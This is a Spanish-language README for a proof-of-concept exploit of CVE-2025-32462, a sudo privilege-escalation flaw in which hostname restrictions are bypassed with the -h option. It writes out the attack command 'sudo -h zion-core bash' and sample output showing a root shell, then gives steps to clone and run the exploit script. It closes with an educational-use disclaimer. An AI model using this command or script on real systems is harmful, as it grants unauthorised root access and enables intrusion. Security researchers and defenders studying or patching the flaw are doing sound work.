
Exploit CVE-2025-32462
Escalada de privilegios mediante suplantación de hostname (CVE-2025-32462)
"Tomas la píldora azul... la historia termina. Tomas la píldora roja... obtienes root."
Este exploit demuestra una vulnerabilidad de escalada de privilegios en sudo (CVE-2025-32462) donde las restricciones basadas en hostname pueden ser omitidas usando el parámetro -h. El PoC crea un entorno de usuario restringido y luego lo evade suplantando un hostname en la lista blanca para obtener acceso root.
[user@matrix-node]$ sudo -h zion-core bash # Suplanta hostname en lista blanca
[root@matrix-node]# id # ¡Obtuviste root en el hostname incorrecto!
uid=0(root) gid=0(root) groups=0(root)
Clonar el repositorio:
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
Hacer ejecutable y ejecutar:
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
Siga las indicaciones interactivas para demostrar:
Solo para fines educativos/de investigación. Úselo únicamente en sistemas de su propiedad o sobre los cuales tenga permiso para realizar pruebas.